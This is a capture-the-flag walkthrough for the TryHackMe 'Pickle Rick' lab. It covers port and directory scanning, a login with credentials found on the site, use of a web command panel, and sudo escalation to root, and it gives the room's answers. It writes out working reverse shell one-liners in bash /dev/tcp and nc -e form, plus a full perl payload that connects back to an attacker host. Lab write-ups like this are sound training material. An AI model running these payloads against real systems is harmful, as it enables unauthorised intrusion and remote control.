TryHackMe: Pickle Rick

  1. What is the first ingredient Rick needs?

Port scan

nmap -Pn <ip>

High port scan

nmap -p1000- -Pn <ip>

Service and OS scan

nmap -p 22,80,146,512,2045,2222 -A <ip>

- 22 OpenSSH7.2p2
- 80 Apache/2.4.18

OS: Ubuntu

Vulnerable scan

nmap -p 22,80 --script vuln <ip>

Access HTTP site

View source. I have a username “R1ckRul3s”

Inspect Element. Nothing useful

Scan for directory with dirb

dirb http://<ip>/

Access robots.txt, nothing much except “Wubbalubbadubdub”.

Further directory scan with gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html

There’s login.php

Access login.php page

Login with R1ckRul3s:Wubbalubbadubdub


Let’s explore other panel, nothing much useful.

Back to command panel, let’s test it


It’s work. Now I can create reverse shell.

Create listener

nc -lvp 1234

Reverse shell reference:

bash -i >& /dev/tcp/<ip>/1234 0>&1

Failed!!! I don’t have any shell.

Try another command

nc -e /bin/sh <ip> 1234

Failed!!! I don’t have any shell. Seems like I’m stuck with some filter.

Let’s try other way around. Exploring files.

cat Sup3rS3cretPickl3Ingred.txt


Try other command

less Sup3rS3cretPickl3Ingred.txt

ANS: mr. meeseek hair

2. Whats the second ingredient Rick needs?

Read clue.txt

less clue.txt

Check if I can run sudo

sudo -l

I can run anything

ls -la /home
ls -la /home/rick
less /home/rick/'second ingredients'

ANS: 1 jerry tear

3. Whats the final ingredient Rick needs?

Since I can run sudo. I can access root directory

sudo ls -la /root
sudo less /root/3rd.txt

4. Bonus for reverse shell

Sine I can’t use these:
- bash
- nc
- python

Try perl

perl -e 'use Socket;$i="<ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Now I have a shell.

sudo suid

Now I’m root.